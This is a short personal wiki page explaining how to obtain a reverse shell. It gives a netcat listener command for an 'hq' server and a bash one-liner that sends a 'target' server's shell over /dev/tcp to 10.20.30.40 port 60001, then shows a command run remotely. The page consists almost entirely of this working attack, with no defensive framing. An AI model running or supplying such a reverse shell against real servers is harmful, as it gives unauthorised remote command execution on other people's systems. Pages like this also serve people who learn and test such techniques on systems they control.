wiki'd

by JoKeru

Reverse Shell

A reverse shell is achieved when you "send" a server's shell (in my demo the server is named target) to another server (hq in my setup).

Using this technique you can run root commands on a server you aren't connected.

# open up a tcp port on the "hq" server to "receive" the reverse shell
$ nc -n -l -p 60001
# send the shell from the "target" server to "hq" socket
$ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &
# now on "hq" you can run any command
hostname # command sent to execution on remote host
target # output received from command

Comments